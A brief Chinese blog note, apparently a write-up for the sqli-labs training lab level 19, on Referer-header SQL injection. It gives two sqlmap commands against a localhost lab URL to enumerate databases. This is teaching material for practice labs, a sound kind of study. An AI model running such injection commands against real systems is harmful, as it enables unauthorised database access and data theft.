sql-labs 18-20(sqlmap 注入)-Less19:单引号、引用类型注入点
最编程
2024-03-25 19:32:10
...
跟十八关差不多,只是存在注入点的HTTP请求头参数不一样,这里是referer处存在注入点
同样用两种方式:
注意注入点处要跟上“*”符号
python sqlmap.py -r 1.txt --dbs --threads 8 --technique BEST python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-19/" --referer=" http://127.0.0.1/sqli-labs-master/Less-19/*" --level 4 --dbs --threads 8 --technique BEST